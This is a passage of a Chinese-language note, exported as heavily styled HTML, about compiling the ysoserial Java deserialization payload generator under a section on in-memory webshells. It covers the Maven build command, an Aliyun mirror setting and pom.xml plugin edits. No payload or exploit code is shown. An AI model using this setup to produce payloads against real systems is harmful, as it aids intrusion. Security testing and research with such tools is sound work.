style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;">kingkaki</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">的ysoserial测试,可以在bin/mvn.cmd中修改配置路径指定java的版本</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">mvn package -DskipTests</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">一定要修改maven源!<span style="mso-spacerun:yes;">  </span>conf/setting.xml</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">mirror</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">><span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">      </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">id</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>nexus-aliyun</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">id</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">><span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">      </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">mirrorOf</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>central</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">mirrorOf</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">      </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">name</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>Nexus aliyun</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">name</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">><span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                    </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">      </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">url</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">><a href="http://maven.aliyun.com/nexus/content/groups/public" target="_blank">http://maven.aliyun.com/nexus/content/groups/public</a></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">url</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">><span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                      </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">mirror</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                        

                        </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Cambria;">还要修改pom.xml中的org.apache.maven.plugins和maven-assembly-plugin</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                        

                        </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">groupId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>org.apache.maven.plugins</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">groupId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                          </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">artifactId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>maven-compiler-plugin</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">artifactId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                            </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">version</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>3.5.1</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">version</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">configuration</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">source</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>1.8</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">source</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">target</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>1.8</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">target</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                  </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                  </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">compilerArgument</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>-XDignore.symbol.file</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">compilerArgument</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                    </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">fork</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>true</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">fork</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                      </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">configuration</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                        </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ErrorTok';color: #FF0000;font-weight: bold;font-family: Consolas;"><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">/plugin></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                        </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">plugin</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                        </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">artifactId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>maven-assembly-plugin</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">artifactId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                          </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">configuration</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                          </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">finalName</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>${project.artifactId}-${project.version}-all</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">finalName</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                            </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">appendAssemblyId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>false</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">appendAssemblyId</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">archive</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">manifest</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">mainClass</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">>ysoserial.GeneratePayload</span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">mainClass</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                                </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;" lang="EN-US"><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span><span style="mso-tab-count:1 Blank;">           </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">manifest</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="font-family:Cambria;">                                                  </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark: 内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 